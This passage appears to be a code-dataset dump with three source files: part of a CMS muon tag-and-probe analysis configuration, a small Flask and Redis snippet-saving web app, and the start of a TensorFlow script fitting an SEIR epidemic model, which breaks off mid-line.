)\n\nprocess.combReliso = selectedLayer1Muons.clone(src = 'comb', \n cut = '(trackIso+caloIso)/pt < 0.05' # !!! \n )\n\nprocess.combTrkisoEcal = selectedLayer1Muons.clone(src = 'combTrkiso', \n cut = 'ecalIsoDeposit.candEnergy < 4' \n )\n\nprocess.combTrkisoHcal = selectedLayer1Muons.clone(src = 'combTrkiso', \n cut = 'hcalIsoDeposit.candEnergy < 6' \n )\n\nprocess.combTrkisoCaliso = selectedLayer1Muons.clone(src = 'combTrkiso', \n cut = 'caloIso < 5.' 
\n )\n\n\n\n\n\nprocess.trackMuEcalHcalTrkiso = selectedLayer1Muons.clone(src = 'trackMuEcalHcal', \n cut = 'trackIso < 1.'\n )\n\nprocess.trackMuEcalHcalCaliso = selectedLayer1Muons.clone(src = 'trackMuEcalHcal', \n cut = 'caloIso < 5.'\n )\n\nprocess.trackMuEcalHcalReliso = selectedLayer1Muons.clone(src = 'trackMuEcalHcal', \n cut = '(trackIso+caloIso)/pt < 0.05'\n )\n\n\n\n\n\n\nprocess.cutFlowProbeTest = cms.Sequence(process.comb +\n process.combValhit +\n process.combChi2 +\n process.combTrksig +\n process.combValhitChi2Trksig +\n\n process.trackMuEcal +\n process.trackMuHcal +\n process.trackMuEcalHcal +\n process.trackMuTrkiso +\n process.trackMuCaliso +\n process.trackMuReliso +\n\n\n process.trackMuEcalHcalTrkiso +\n process.trackMuEcalHcalCaliso +\n process.trackMuEcalHcalReliso +\n \n process.combEcal +\n process.combHcal +\n process.combEcalHcal +\n process.combEcalHcalTrkiso +\n process.combEcalHcalCaliso +\n process.combEcalHcalReliso +\n\n\n\n process.combTrkiso +\n process.combCaliso +\n process.combReliso +\n process.combTrkisoEcal +\n process.combTrkisoHcal +\n process.combTrkisoCaliso \n \n ) \n\n\n## ---\n## tagAndProbeAnalyzer\n## ---\n\n\nprocess.load(\"TopAnalysis.TopAnalyzer.TagAndProbeAnalyzer_cfi\")\n\n\n\nprocess.comb_combValhit = process.tagAndProbeAnalyzer.clone(probes = \"comb\", tests = \"combValhit\" , jets = \"jetsCF2\" )\nprocess.comb_combChi2 = process.tagAndProbeAnalyzer.clone(probes = \"comb\", tests = \"combChi2\" , jets = \"jetsCF2\" )\nprocess.comb_combTrksig = process.tagAndProbeAnalyzer.clone(probes = \"comb\", tests = \"combTrksig\" , jets = \"jetsCF2\" )\nprocess.comb_combTrackMu = process.tagAndProbeAnalyzer.clone(probes = \"comb\", tests = \"combValhitChi2Trksig\" , jets = \"jetsCF2\" )\nprocess.comb_combEcal = process.tagAndProbeAnalyzer.clone(probes = \"comb\", tests = \"combEcal\" , jets = \"jetsCF2\" )\nprocess.comb_combHcal = process.tagAndProbeAnalyzer.clone(probes = \"comb\", tests = \"combHcal\" , jets = \"jetsCF2\" )\nprocess.comb_combEcalHcal = process.tagAndProbeAnalyzer.clone(probes = \"comb\", tests = \"combEcalHcal\" , jets = \"jetsCF2\" )\nprocess.comb_combTrackMuEcalHcal = process.tagAndProbeAnalyzer.clone(probes = \"comb\", tests = \"trackMuEcalHcal\" , jets = \"jetsCF2\" )\n\n\nprocess.trackMu_combEcal = process.tagAndProbeAnalyzer.clone(probes = \"combValhitChi2Trksig\", tests = \"trackMuEcal\" , jets = \"jetsCF2\" )\nprocess.trackMu_combHcal = process.tagAndProbeAnalyzer.clone(probes = \"combValhitChi2Trksig\", tests = \"trackMuHcal\" , jets = \"jetsCF2\" )\nprocess.trackMu_combEcalHcal = process.tagAndProbeAnalyzer.clone(probes = \"combValhitChi2Trksig\", tests = \"trackMuEcalHcal\", jets = \"jetsCF2\" )\nprocess.trackMu_combTrkiso = process.tagAndProbeAnalyzer.clone(probes = \"combValhitChi2Trksig\", tests = \"trackMuTrkiso\" , jets = \"jetsCF2\" )\nprocess.trackMu_combCaliso = process.tagAndProbeAnalyzer.clone(probes = \"combValhitChi2Trksig\", tests = \"trackMuCaliso\" , jets = \"jetsCF2\" )\nprocess.trackMu_combReliso = process.tagAndProbeAnalyzer.clone(probes = \"combValhitChi2Trksig\", tests = \"trackMuReliso\" , jets = \"jetsCF2\" )\n\n\nprocess.combEcalHcal_trackMu = process.tagAndProbeAnalyzer.clone(probes = \"combEcalHcal\", tests = \"trackMuEcalHcal\" , jets = \"jetsCF2\" )\nprocess.combEcalHcal_combTrkiso = process.tagAndProbeAnalyzer.clone(probes = \"combEcalHcal\", tests = \"combEcalHcalTrkiso\" , jets = \"jetsCF2\" )\nprocess.combEcalHcal_combCaliso = process.tagAndProbeAnalyzer.clone(probes = 
\"combEcalHcal\", tests = \"combEcalHcalCaliso\" , jets = \"jetsCF2\" )\nprocess.combEcalHcal_combReliso = process.tagAndProbeAnalyzer.clone(probes = \"combEcalHcal\", tests = \"combEcalHcalReliso\" , jets = \"jetsCF2\" )\n\n\nprocess.trackMuEcalHcal_combTrkiso = process.tagAndProbeAnalyzer.clone(probes = \"trackMuEcalHcal\", tests = \"trackMuEcalHcalTrkiso\" , jets = \"jetsCF2\" )\nprocess.trackMuEcalHcal_combCaliso = process.tagAndProbeAnalyzer.clone(probes = \"trackMuEcalHcal\", tests = \"trackMuEcalHcalCaliso\" , jets = \"jetsCF2\" )\nprocess.trackMuEcalHcal_combReliso = process.tagAndProbeAnalyzer.clone(probes = \"trackMuEcalHcal\", tests = \"trackMuEcalHcalReliso\" , jets = \"jetsCF2\" )\n\n\nprocess.combTrkiso_trackMu = process.tagAndProbeAnalyzer.clone(probes = \"combTrkiso\", tests = \"trackMuTrkiso\" , jets = \"jetsCF2\" )\nprocess.combTrkiso_combEcal = process.tagAndProbeAnalyzer.clone(probes = \"combTrkiso\", tests = \"combTrkisoEcal\" , jets = \"jetsCF2\" )\nprocess.combTrkiso_combHcal = process.tagAndProbeAnalyzer.clone(probes = \"combTrkiso\", tests = \"combTrkisoHcal\" , jets = \"jetsCF2\" )\nprocess.combTrkiso_combEcalHcal = process.tagAndProbeAnalyzer.clone(probes = \"combTrkiso\", tests = \"combEcalHcalTrkiso\" , jets = \"jetsCF2\" )\nprocess.combTrkiso_combCaliso = process.tagAndProbeAnalyzer.clone(probes = \"combTrkiso\", tests = \"combTrkisoCaliso\" , jets = \"jetsCF2\" )\n\n\n\n\nprocess.probeTestAnalysis = cms.Sequence(process.comb_combValhit +\n process.comb_combChi2 +\n process.comb_combTrksig +\n process.comb_combTrackMu +\n process.comb_combEcal +\n process.comb_combHcal +\n process.comb_combEcalHcal +\n process.comb_combTrackMuEcalHcal +\n\n process.trackMu_combEcal +\n process.trackMu_combHcal +\n process.trackMu_combEcalHcal +\n process.trackMu_combTrkiso +\n process.trackMu_combCaliso +\n process.trackMu_combReliso +\n\n process.combEcalHcal_trackMu + \n process.combEcalHcal_combTrkiso +\n process.combEcalHcal_combCaliso +\n process.combEcalHcal_combReliso +\n\n process.trackMuEcalHcal_combTrkiso +\n process.trackMuEcalHcal_combCaliso +\n process.trackMuEcalHcal_combReliso +\n\n process.combTrkiso_trackMu +\n process.combTrkiso_combEcal +\n process.combTrkiso_combHcal +\n process.combTrkiso_combEcalHcal +\n process.combTrkiso_combCaliso \n )\n\n\n\nprocess.comb_combValhit_2 = process.comb_combValhit.clone() \nprocess.comb_combChi2_2 = process.comb_combChi2.clone() \nprocess.comb_combTrksig_2 = process.comb_combTrksig.clone() \nprocess.comb_combTrackMu_2 = process.comb_combTrackMu.clone() \nprocess.comb_combEcal_2 = process.comb_combEcal.clone() \nprocess.comb_combHcal_2 = process.comb_combHcal.clone() \nprocess.comb_combEcalHcal_2 = process.comb_combEcalHcal.clone() \n\n\nprocess.trackMu_combEcal_2 = process.trackMu_combEcal.clone()\nprocess.trackMu_combHcal_2 = process.trackMu_combHcal.clone()\nprocess.trackMu_combEcalHcal_2 = process.trackMu_combEcalHcal.clone()\nprocess.trackMu_combTrkiso_2 = process.trackMu_combTrkiso.clone()\nprocess.trackMu_combCaliso_2 = process.trackMu_combCaliso.clone()\nprocess.trackMu_combReliso_2 = process.trackMu_combReliso.clone()\n\nprocess.combEcalHcal_trackMu_2 = process.combEcalHcal_trackMu.clone() \nprocess.combEcalHcal_combTrkiso_2 = process.combEcalHcal_combTrkiso.clone()\nprocess.combEcalHcal_combCaliso_2 = process.combEcalHcal_combCaliso.clone()\nprocess.combEcalHcal_combReliso_2 = process.combEcalHcal_combReliso.clone()\n\nprocess.trackMuEcalHcal_combTrkiso_2 = 
process.trackMuEcalHcal_combTrkiso.clone()\nprocess.trackMuEcalHcal_combCaliso_2 = process.trackMuEcalHcal_combCaliso.clone()\nprocess.trackMuEcalHcal_combReliso_2 = process.trackMuEcalHcal_combReliso.clone()\n\nprocess.combTrkiso_trackMu_2 = process.combTrkiso_trackMu.clone()\nprocess.combTrkiso_combEcal_2 = process.combTrkiso_combEcal.clone()\nprocess.combTrkiso_combHcal_2 = process.combTrkiso_combHcal.clone()\nprocess.combTrkiso_combEcalHcal_2 = process.combTrkiso_combEcalHcal.clone()\nprocess.combTrkiso_combCaliso_2 = process.combTrkiso_combCaliso.clone()\n\n\n\nprocess.probeTestAnalysis_2 = cms.Sequence(\n\n process.comb_combValhit_2 +\n process.comb_combChi2_2 +\n process.comb_combTrksig_2 +\n process.comb_combTrackMu_2 +\n process.comb_combEcal_2 +\n process.comb_combHcal_2 +\n process.comb_combEcalHcal_2 + \n\n process.trackMu_combEcal_2 +\n process.trackMu_combHcal_2 +\n process.trackMu_combEcalHcal_2 +\n process.trackMu_combTrkiso_2 +\n process.trackMu_combCaliso_2 +\n process.trackMu_combReliso_2 +\n\n process.combEcalHcal_trackMu_2 + \n process.combEcalHcal_combTrkiso_2 +\n process.combEcalHcal_combCaliso_2 +\n process.combEcalHcal_combReliso_2 +\n\n process.trackMuEcalHcal_combTrkiso_2 +\n process.trackMuEcalHcal_combCaliso_2 +\n process.trackMuEcalHcal_combReliso_2 +\n\n process.combTrkiso_trackMu_2 +\n process.combTrkiso_combEcal_2 +\n process.combTrkiso_combHcal_2 +\n process.combTrkiso_combEcalHcal_2 +\n process.combTrkiso_combCaliso_2 \n )\n\n\n\n\n\nprocess.comb_combValhit_3 = process.comb_combValhit.clone() \nprocess.comb_combChi2_3 = process.comb_combChi2.clone() \nprocess.comb_combTrksig_3 = process.comb_combTrksig.clone() \nprocess.comb_combTrackMu_3 = process.comb_combTrackMu.clone() \nprocess.comb_combEcal_3 = process.comb_combEcal.clone() \nprocess.comb_combHcal_3 = process.comb_combHcal.clone() \nprocess.comb_combEcalHcal_3 = process.comb_combEcalHcal.clone() \n\n\nprocess.trackMu_combEcal_3 = process.trackMu_combEcal.clone()\nprocess.trackMu_combHcal_3 = process.trackMu_combHcal.clone()\nprocess.trackMu_combEcalHcal_3 = process.trackMu_combEcalHcal.clone()\nprocess.trackMu_combTrkiso_3 = process.trackMu_combTrkiso.clone()\nprocess.trackMu_combCaliso_3 = process.trackMu_combCaliso.clone()\nprocess.trackMu_combReliso_3 = process.trackMu_combReliso.clone()\n\nprocess.combEcalHcal_trackMu_3 = process.combEcalHcal_trackMu.clone() \nprocess.combEcalHcal_combTrkiso_3 = process.combEcalHcal_combTrkiso.clone()\nprocess.combEcalHcal_combCaliso_3 = process.combEcalHcal_combCaliso.clone()\nprocess.combEcalHcal_combReliso_3 = process.combEcalHcal_combReliso.clone()\n\nprocess.trackMuEcalHcal_combTrkiso_3 = process.trackMuEcalHcal_combTrkiso.clone()\nprocess.trackMuEcalHcal_combCaliso_3 = process.trackMuEcalHcal_combCaliso.clone()\nprocess.trackMuEcalHcal_combReliso_3 = process.trackMuEcalHcal_combReliso.clone()\n\nprocess.combTrkiso_trackMu_3 = process.combTrkiso_trackMu.clone()\nprocess.combTrkiso_combEcal_3 = process.combTrkiso_combEcal.clone()\nprocess.combTrkiso_combHcal_3 = process.combTrkiso_combHcal.clone()\nprocess.combTrkiso_combEcalHcal_3 = process.combTrkiso_combEcalHcal.clone()\nprocess.combTrkiso_combCaliso_3 = process.combTrkiso_combCaliso.clone()\n\n\nprocess.probeTestAnalysis_3 = cms.Sequence(\n\n process.comb_combValhit_3 +\n process.comb_combChi2_3 +\n process.comb_combTrksig_3 +\n process.comb_combTrackMu_3 +\n process.comb_combEcal_3 +\n process.comb_combHcal_3 +\n process.comb_combEcalHcal_3 + \n\n process.trackMu_combEcal_3 +\n 
process.trackMu_combHcal_3 +\n process.trackMu_combEcalHcal_3 +\n process.trackMu_combTrkiso_3 +\n process.trackMu_combCaliso_3 +\n process.trackMu_combReliso_3 +\n\n process.combEcalHcal_trackMu_3 + \n process.combEcalHcal_combTrkiso_3 +\n process.combEcalHcal_combCaliso_3 +\n process.combEcalHcal_combReliso_3 +\n\n process.trackMuEcalHcal_combTrkiso_3 +\n process.trackMuEcalHcal_combCaliso_3 +\n process.trackMuEcalHcal_combReliso_3 +\n\n process.combTrkiso_trackMu_3 +\n process.combTrkiso_combEcal_3 +\n process.combTrkiso_combHcal_3 +\n process.combTrkiso_combEcalHcal_3 +\n process.combTrkiso_combCaliso_3 \n )\n\n\n\n \n\n## ---\n## muon quality analyzer\n## ---\nprocess.load(\"TopAnalysis.TopAnalyzer.MuonQuality_cfi\")\n\n## 1. leading muon with standAlone restriction\nprocess.muonID_1st_CF1StAl = process.analyzeMuonQuality.clone(src='muonCF1StAl')\n\n\n\n## ---\n## run the final sequence\n## ---\nprocess.p1 = cms.Path(## do the gen event selection (decay channel)\n process.genFilterSequence *\n ## the trigger selection (hltEle15)\n process.recFilterSequence *\n\n \n ## get corresponding electron collection\n process.idOnlyElectrons *\n process.centralElectrons *\n process.highPtElectrons *\n process.tightElectrons *\n process.electronCF2 *\n process.electronCF3 *\n \n ## do the electron monitoring\n process.monitorElectronKinematics *\n process.monitorElectronQuality *\n\n\n ## do the electron event selection\n ##process.electronSelection *\n process.elecSelIdPtEta *\n process.elecSelRelIso *\n\n \n ## get corresponding jet collections\n process.reliableJets *\n process.centralJets *\n process.goodJets *\n process.jetsCF1 *\n process.jetsCF2 *\n process.bJetsCF2 *\n process.lightQJetsCF2 *\n process.jetsCF3HighPur *\n process.jetsCF3HighEff *\n\n ## do the jet monitoring\n process.monitorJetKinematics *\n process.monitorJetQuality *\n\n\n ## do the jet event selection\n ##process.jetSelection1 *\n ##process.jetSelection2 *\n process.jetSelPtEtaEmf *\n process.jetSelBtag *\n\n\n process.analyzeMETKinematics *\n ## missing ET selection\n process.selectedLayer1MET *\n process.selectEventsWithMET *\n\n \n ## get corresponding muon collection\n process.muonCF0 *\n process.muonCF1StAl *\n process.muonCF1Comb * \n\n ## do the muon monitoring\n process.muonKin *\n process.muonID *\n\n\n ## CUT FLOW (from below because of application in muon selection)\n process.cutFlowProbeTest *\n\n\n ## do the muon event selection\n process.muonSelStAl *\n process.muonSelComb *\n\n #process.muonSelTrkiso *\n process.muonSelReliso *\n #process.muonSelCaliso *\n\n\n\n ## END of TAG !!! 
!!!!!\n\n\n \n ##process.muonSelEcalHcal *\n ##process.muonSelTrackMu *\n \n \n\n ## electron monitoring aac (after all cuts) \n process.monitorElectronKinematics_aac *\n process.monitorElectronQuality_aac *\n\n ## jet monitoring aac\n process.monitorJetKinematics_aac *\n process.monitorJetQuality_aac *\n\n ## muon monitoring aac\n process.muonKin_aac *\n process.muonID_aac *\n\n ## remains of muon event selection\n ## process.muonSelComb *\n\n\n ## probeTest analysis\n\n\n ## CUT FLOW (above)\n \n\n ## tagAndProbeAnalyzer \n process.probeTestAnalysis *\n\n\n ## further muon event selection for statistics\n ##process.muonSelTrackMu\n\n process.muonSelValhit *\n process.muonSelChi2 *\n process.muonSelTrksig *\n\n\n ## further muon event selection\n process.muonSelEcalHcal *\n\n\n process.probeTestAnalysis_2 *\n\n\n ## single-muon trigger, threshold pt > 9 GeV, no isolation requirements\n process.hltMu9 *\n\n ## 2nd tagAndProbeAnalyzer\n process.probeTestAnalysis_3 \n \n ## test of top decay channels \n #process.topDecayChannelDQM + \n #process.dqmSaver\n \n )\n","sub_path":"Configuration/analysis/fullLeptonic/analyzeFullLeptonicSelection_dilepSelecActive_cfg.py","file_name":"analyzeFullLeptonicSelection_dilepSelecActive_cfg.py","file_ext":"py","file_size_in_byte":71770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} {"seq_id":"241302070","text":"import uuid\nimport os\nimport redis\n\nfrom flask import Flask, render_template, abort, request, jsonify\n\napp = Flask(__name__)\nr = redis.StrictRedis.from_url(os.environ['REDIS_URL'], decode_responses=True)\n\n\n@app.route(\"/\")\ndef index():\n return render_template(\"index.html\", examples=load_examples())\n\n\n@app.route(\"/examples/<name>/\")\ndef get_example(name):\n try:\n return jsonify(code=render_template(\"examples/{}.txt\".format(name)))\n except:\n abort(404)\n\n\n@app.route(\"/load/<id>/\")\ndef list_custom(id):\n return jsonify(names=r.hkeys(id))\n\n\n@app.route(\"/load/<id>/<name>/\")\ndef load_custom(id, name):\n return jsonify(code=r.hget(id, name))\n\n\n@app.route('/save/', methods=['POST'])\n@app.route('/save/<id>/', methods=['POST'])\ndef save(id=None):\n if id is None:\n id = uuid.uuid4()\n code = request.get_json()['code']\n for l in code.splitlines():\n if l.startswith('name:'):\n name = l[5:].strip()\n break\n r.hset(id, name, code)\n return jsonify(id=id, name=name)\n\n\ndef load_examples():\n path = os.path.join(\"templates\", \"examples\")\n for f in os.listdir(path):\n with open(os.path.join(path, f), 'r') as fd:\n for l in fd.readlines():\n if l.startswith('name:'):\n filename, _ = os.path.splitext(f)\n yield {'name': l[5:].strip(), 'filename': filename}\n break\n\n\nif __name__ == '__main__':\n app.run(debug=True, host='0.0.0.0')\n","sub_path":"tms.py","file_name":"tms.py","file_ext":"py","file_size_in_byte":1491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} {"seq_id":"477382395","text":"\"\"\"\r\n@author: LXA\r\nBenchmark Code of SEIR model\r\n2020-11-13\r\n\"\"\"\r\nimport os\r\nimport sys\r\nimport tensorflow as tf\r\nimport numpy as np\r\nimport time\r\nimport platform\r\nimport shutil\r\nimport DNN_base\r\nimport RNN_tools\r\nimport RNN_data\r\nimport plotData\r\nimport saveData\r\n\r\n\r\n# log some of the settings stored in the dictionary R\r\ndef dictionary_out2file(R_dic, log_fileout):\r\n RNN_tools.log_string('Equation name for problem: %s\n' % (R_dic['eqs_name']), log_fileout)\r\n RNN_tools.log_string('Network model of solving problem: %s\n' % str(R_dic['model']), 
log_fileout)\r\n RNN_tools.log_string('activate function: %s\n' % str(R_dic['act_name']), log_fileout)\r\n RNN_tools.log_string('hidden layers: %s\n' % str(R_dic['hidden_layers']), log_fileout)\r\n RNN_tools.log_string('Init learning rate: %s\n' % str(R_dic['learning_rate']), log_fileout)\r\n RNN_tools.log_string('Decay to learning rate: %s\n' % str(R_dic['lr_decay']), log_fileout)\r\n RNN_tools.log_string('The type for Loss function: %s\n' % str(R_dic['loss_function']), log_fileout)\r\n if (R_dic['optimizer_name']).title() == 'Adam':\r\n RNN_tools.log_string('optimizer:%s\n' % str(R_dic['optimizer_name']), log_fileout)\r\n else:\r\n RNN_tools.log_string('optimizer:%s with momentum=%f\n' % (R_dic['optimizer_name'], R_dic['momentum']),\r\n log_fileout)\r\n\r\n if R_dic['activate_stop'] != 0:\r\n RNN_tools.log_string('activate the stop_step and given_step= %s\n' % str(R_dic['max_epoch']), log_fileout)\r\n else:\r\n RNN_tools.log_string('no activate the stop_step and given_step = default: %s\n' % str(R_dic['max_epoch']),\r\n log_fileout)\r\n\r\n RNN_tools.log_string(\r\n 'Initial penalty for difference of predict and true: %s\n' % str(R_dic['init_penalty2predict_true']),\r\n log_fileout)\r\n\r\n RNN_tools.log_string('The model of regular weights and biases: %s\n' % str(R_dic['regular_weight_model']),\r\n log_fileout)\r\n\r\n RNN_tools.log_string('Regularization parameter for weights and biases: %s\n' % str(R_dic['regular_weight']),\r\n log_fileout)\r\n\r\n RNN_tools.log_string('Size 2 training set: %s\n' % str(R_dic['size2train']), log_fileout)\r\n\r\n RNN_tools.log_string('Batch-size 2 training: %s\n' % str(R_dic['batch_size2train']), log_fileout)\r\n\r\n RNN_tools.log_string('Batch-size 2 testing: %s\n' % str(R_dic['batch_size2test']), log_fileout)\r\n\r\n\r\ndef print_and_log2train(i_epoch, run_time, tmp_lr, temp_penalty_nt, penalty_wb2s, penalty_wb2e, penalty_wb2i, penalty_wb2r,\r\n loss_s, loss_e, loss_i, loss_r, loss_n, log_out=None):\r\n print('train epoch: %d, time: %.3f' % (i_epoch, run_time))\r\n print('learning rate: %f' % tmp_lr)\r\n print('penalty for difference of predict and true : %f' % temp_penalty_nt)\r\n print('penalty weights and biases for S: %f' % penalty_wb2s)\r\n print('penalty weights and biases for E: %f' % penalty_wb2e)\r\n print('penalty weights and biases for I: %f' % penalty_wb2i)\r\n print('penalty weights and biases for R: %f' % penalty_wb2r)\r\n print('loss for S: %.10f' % loss_s)\r\n print('loss for E: %.10f' % loss_e)\r\n print('loss for I: %.10f' % loss_i)\r\n print('loss for R: %.10f' % loss_r)\r\n print('total loss: %.10f\n' % loss_n)\r\n\r\n RNN_tools.log_string('train epoch: %d, time: %.3f' % (i_epoch, run_time), log_out)\r\n RNN_tools.log_string('learning rate: %f' % tmp_lr, log_out)\r\n RNN_tools.log_string('penalty for difference of predict and true : %f' % temp_penalty_nt, log_out)\r\n RNN_tools.log_string('penalty weights and biases for S: %f' % penalty_wb2s, log_out)\r\n RNN_tools.log_string('penalty weights and biases for E: %f' % penalty_wb2e, log_out)\r\n RNN_tools.log_string('penalty weights and biases for I: %f' % penalty_wb2i, log_out)\r\n RNN_tools.log_string('penalty weights and biases for R: %f' % penalty_wb2r, log_out)\r\n RNN_tools.log_string('loss for S: %.10f' % loss_s, log_out)\r\n RNN_tools.log_string('loss for E: %.10f' % loss_e, log_out)\r\n RNN_tools.log_string('loss for I: %.10f' % loss_i, log_out)\r\n RNN_tools.log_string('loss for R: %.10f' % loss_r, log_out)\r\n RNN_tools.log_string('total loss: %.10f' % 
loss_n, log_out)\r\n\r\n\r\ndef solve_SEIR2COVID(R):\r\n log_out_path = R['FolderName'] # extract the output path from the dictionary R\r\n if not os.path.exists(log_out_path): # check whether the path already exists\r\n os.mkdir(log_out_path) # if log_out_path does not exist, create it\r\n log_fileout = open(os.path.join(log_out_path, 'log_train.txt'), 'w') # create and open a writable log_train.txt file under this path\r\n dictionary_out2file(R, log_fileout)\r\n\r\n trainSet_szie = R['size2train']\r\n train_size2batch = R['batch_size2train']\r\n test_size2batch = R['batch_size2test']\r\n pt_penalty_init = R['init_penalty2predict_true'] # Regularization parameter for difference of predict and true\r\n wb_penalty = R['regular_weight'] # Regularization parameter for weights\r\n lr_decay = R['lr_decay']\r\n learning_rate = R['learning_rate']\r\n act_func = R['act_name']\r\n\r\n input_dim = R['input_dim']\r\n out_dim = R['output_dim']\r\n\r\n flag2S = 'WB2S'\r\n flag2E = 'WB2E'\r\n flag2I = 'WB2I'\r\n flag2R = 'WB2R'\r\n hidden_layers = R['hidden_layers']\r\n Weight2S, Bias2S = DNN_base.initialize_NN_random_normal2(input_dim, out_dim, hidden_layers, flag2S)\r\n Weight2E, Bias2E = DNN_base.initialize_NN_random_normal2(input_dim, out_dim, hidden_layers, flag2E)\r\n Weight2I, Bias2I = DNN_base.initialize_NN_random_normal2(input_dim, out_dim, hidden_layers, flag2I)\r\n Weight2R, Bias2R = DNN_base.initialize_NN_random_normal2(input_dim, out_dim, hidden_layers, flag2R)\r\n\r\n flag2alpha = 'WB2alpha'\r\n flag2beta = 'WB2beta'\r\n flag2gamma = 'WB2gamma'\r\n Weight2alpha, Bias2alpha = DNN_base.initialize_NN_random_normal2(input_dim, out_dim, hidden_layers, flag2alpha)\r\n Weight2beta, Bias2beta = DNN_base.initialize_NN_random_normal2(input_dim, out_dim, hidden_layers, flag2beta)\r\n Weight2gamma, Bias2gamma = DNN_base.initialize_NN_random_normal2(input_dim, out_dim, hidden_layers, flag2gamma)\r\n\r\n global_steps = tf.Variable(0, trainable=False)\r\n with tf.device('/gpu:%s' % (R['gpuNo'])):\r\n with tf.variable_scope('vscope', reuse=tf.AUTO_REUSE):\r\n T_it = tf.placeholder(tf.float32, name='T_it', shape=[None, out_dim])\r\n I_observe = tf.placeholder(tf.float32, name='I_observe', shape=[None, out_dim])\r\n N_observe = tf.placeholder(tf.float32, name='N_observe', shape=[None, out_dim])\r\n predict_true_penalty = tf.placeholder_with_default(input=1e3, shape=[], name='bd_p')\r\n in_learning_rate = tf.placeholder_with_default(input=1e-5, shape=[], name='lr')\r\n # in_alpha = tf.placeholder_with_default(input=1e-5, shape=[], name='beta')\r\n # in_beta = tf.placeholder_with_default(input=1e-5, shape=[], name='beta')\r\n # in_gamma = tf.placeholder_with_default(input=1e-5, shape=[], name='lr')\r\n train_opt = tf.placeholder_with_default(input=True, shape=[], name='train_opt')\r\n if 'PDE_DNN' == str.upper(R['model']):\r\n S_NN = DNN_base.PDE_DNN(T_it, Weight2S, Bias2S, hidden_layers, activate_name=act_func)\r\n E_NN = DNN_base.PDE_DNN(T_it, Weight2E, Bias2E, hidden_layers, activate_name=act_func)\r\n I_NN = DNN_base.PDE_DNN(T_it, Weight2I, Bias2I, hidden_layers, activate_name=act_func)\r\n R_NN = DNN_base.PDE_DNN(T_it, Weight2R, Bias2R, hidden_layers, activate_name=act_func)\r\n in_alpha = DNN_base.PDE_DNN(T_it, Weight2alpha, Bias2alpha, hidden_layers, activate_name=act_func)\r\n in_beta = DNN_base.PDE_DNN(T_it, Weight2beta, Bias2beta, hidden_layers, activate_name=act_func)\r\n in_gamma = DNN_base.PDE_DNN(T_it, Weight2gamma, Bias2gamma, hidden_layers, activate_name=act_func)\r\n elif 'PDE_DNN_Fourier' == R['model']:\r\n S_NN = DNN_base.PDE_DNN(T_it, Weight2S, Bias2S, hidden_layers, 
activate_name=act_func)\r\n E_NN = DNN_base.PDE_DNN(T_it, Weight2E, Bias2E, hidden_layers, activate_name=act_func)\r\n I_NN = DNN_base.PDE_DNN(T_it, Weight2I, Bias2I, hidden_layers, activate_name=act_func)\r\n R_NN = DNN_base.PDE_DNN(T_it, Weight2R, Bias2R, hidden_layers, activate_name=act_func)\r\n in_alpha = DNN_base.PDE_DNN(T_it, Weight2alpha, Bias2alpha, hidden_layers, activate_name=act_func)\r\n in_beta = DNN_base.PDE_DNN(T_it, Weight2beta, Bias2beta, hidden_layers, activate_name=act_func)\r\n in_gamma = DNN_base.PDE_DNN(T_it, Weight2gamma, Bias2gamma, hidden_layers, activate_name=act_func)\r\n elif 'PDE_DNN_BN' == str.upper(R['model']):\r\n S_NN = DNN_base.PDE_DNN_BN(T_it, Weight2S, Bias2S, hidden_layers, activate_name=act_func, is_training=train_opt)\r\n E_NN = DNN_base.PDE_DNN_BN(T_it, Weight2E, Bias2E, hidden_layers, activate_name=act_func, is_training=train_opt)\r\n I_NN = DNN_base.PDE_DNN_BN(T_it, Weight2I, Bias2I, hidden_layers, activate_name=act_func, is_training=train_opt)\r\n R_NN = DNN_base.PDE_DNN_BN(T_it, Weight2R, Bias2R, hidden_layers, activate_name=act_func, is_training=train_opt)\r\n in_alpha = DNN_base.PDE_DNN_BN(T_it, Weight2alpha, Bias2alpha, hidden_layers, activate_name=act_func, is_training=train_opt)\r\n in_beta = DNN_base.PDE_DNN_BN(T_it, Weight2beta, Bias2beta, hidden_layers, activate_name=act_func, is_training=train_opt)\r\n in_gamma = DNN_base.PDE_DNN_BN(T_it, Weight2gamma, Bias2gamma, hidden_layers, activate_name=act_func, is_training=train_opt)\r\n elif 'PDE_DNN_SCALEOUT' == str.upper(R['model']):\r\n freq = np.concatenate(([1], np.arange(1, 20)*10), axis=0)\r\n S_NN = DNN_base.PDE_DNN_scaleOut(T_it, Weight2S, Bias2S, hidden_layers, freq, activate_name=act_func)\r\n E_NN = DNN_base.PDE_DNN_scaleOut(T_it, Weight2E, Bias2E, hidden_layers, freq, activate_name=act_func)\r\n I_NN = DNN_base.PDE_DNN_scaleOut(T_it, Weight2I, Bias2I, hidden_layers, freq, activate_name=act_func)\r\n R_NN = DNN_base.PDE_DNN_scaleOut(T_it, Weight2R, Bias2R, hidden_layers, freq, activate_name=act_func)\r\n in_alpha = DNN_base.PDE_DNN_scaleOut(T_it, Weight2alpha, Bias2alpha, hidden_layers, freq, activate_name=act_func)\r\n in_beta = DNN_base.PDE_DNN_scaleOut(T_it, Weight2beta, Bias2beta, hidden_layers, freq, activate_name=act_func)\r\n in_gamma = DNN_base.PDE_DNN_scaleOut(T_it, Weight2gamma, Bias2gamma, hidden_layers, freq, activate_name=act_func)\r\n\r\n alpha = tf.exp(in_alpha)\r\n beta = tf.exp(in_beta)\r\n gamma = tf.exp(in_gamma)\r\n\r\n S_NN = DNN_base.gauss(S_NN)\r\n E_NN = DNN_base.gauss(E_NN)\r\n I_NN = DNN_base.gauss(I_NN)\r\n R_NN = DNN_base.gauss(R_NN)\r\n\r\n N_NN = S_NN + E_NN + I_NN + R_NN\r\n\r\n dS_NN2t = tf.gradients(S_NN, T_it)[0]\r\n dE_NN2t = tf.gradients(E_NN, T_it)[0]\r\n dI_NN2t = tf.gradients(I_NN, T_it)[0]\r\n dR_NN2t = tf.gradients(R_NN, T_it)[0]\r\n dN_NN2t = tf.gradients(N_NN, T_it)[0]\r\n\r\n temp_snn2t = -(beta * tf.multiply(S_NN, I_NN))/N_NN # '/' divides element-wise, no matter how many dimensions the tensor has\r\n temp_enn2t = beta*tf.multiply(S_NN, I_NN) - alpha * E_NN\r\n temp_inn2t = alpha * E_NN - gamma * I_NN\r\n temp_rnn2t = gamma * I_NN\r\n\r\n if str.lower(R['loss_function']) == 'l2_loss':\r\n # LossS_Net_obs = tf.reduce_mean(tf.square(S_NN - 